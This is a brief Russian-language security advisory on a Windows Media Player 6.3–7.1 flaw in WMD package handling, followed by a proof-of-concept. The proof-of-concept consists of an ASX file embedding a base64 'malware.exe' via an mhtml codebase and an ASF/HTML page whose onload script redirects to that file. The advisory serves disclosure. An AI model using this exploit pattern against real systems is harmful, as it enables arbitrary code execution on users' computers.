Microsoft Windows Media Player позволяет злонамеренному вложению выполнять произвольный код с системными привилегиями. Уязвимость связанна с неправильной проверкой правильности WMD (*.wmd) файлов. WMD (Windows Media Download) пакеты используются Media Player, чтобы хранить файлы в известном для пользователя каталоге. Нападающий
может составить WMD файл, состоящий из злонамеренных .ASX и .ASF файлов, которые Media Player извлечет в известное местоположение и затем выполнит злонамеренный код. Пример комбинированных .ASX и .ASF файлов:
*.asx файл:
<ASX version="3">
<Entry>
<ref HREF="cluster.asf"/>
</Entry></ASX>
MIME-Version: 1.0
Content-Location:file:///malware.exe
Content-Transfer-Encoding: base64
TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAAEA+zBqcgAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA
<applet CLASSID="CLSID:55555555-5555"
codebase="mhtml:file:///C:\My Documents\My Music\Virtual
Albums\malware\f ck.asx!file:///malware.exe">
*.asf файл:
url: cluster.html
<body onload=malware()>
<script>
function malware(){
alert("malware");location=("file://C%3A%5CMy%20Documents%5CMy%20Music%
5CVirtual%20Albums%5Cmalware%5Cf ck.asx%20.")
}
</script>
Уязвимость обнаружена в Microsoft Windows Media Player 6.3-7.1.